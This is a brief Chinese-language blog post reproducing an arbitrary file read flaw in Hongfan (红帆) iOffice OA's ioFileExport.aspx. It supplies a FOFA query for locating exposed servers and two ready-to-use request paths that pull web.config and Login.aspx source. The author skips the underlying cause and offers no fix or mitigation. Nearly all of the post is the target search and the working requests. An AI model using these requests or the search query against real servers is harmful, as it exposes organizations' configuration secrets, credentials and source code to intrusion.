【漏洞复现】 红帆OA ioFileExport.aspx 任意文件读取漏洞

  1. 【漏洞复现】 红帆OA ioFileExport.aspx 任意文件读取漏洞
    1. fofa语句
    2. poc

【漏洞复现】 红帆OA ioFileExport.aspx 任意文件读取漏洞

现在写漏洞复现也加个标签好了,漏洞原理也加标签,以后便于分辨。但是还是那句话,心情不好来搞网安就对了。今天随便找个漏洞来进行浮现,漏洞原理我就不深究了,主要是体验一下拿到漏洞的那种快感。

fofa语句

fofa:app="红帆-ioffice"

poc

执行POC得到配置文件、源码等信息

/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream

/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/Login.aspx&filename=test.txt&ContentType=application/octet-stream

复现成功

image-20230204002138895

(后面倒是可以来看看)


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。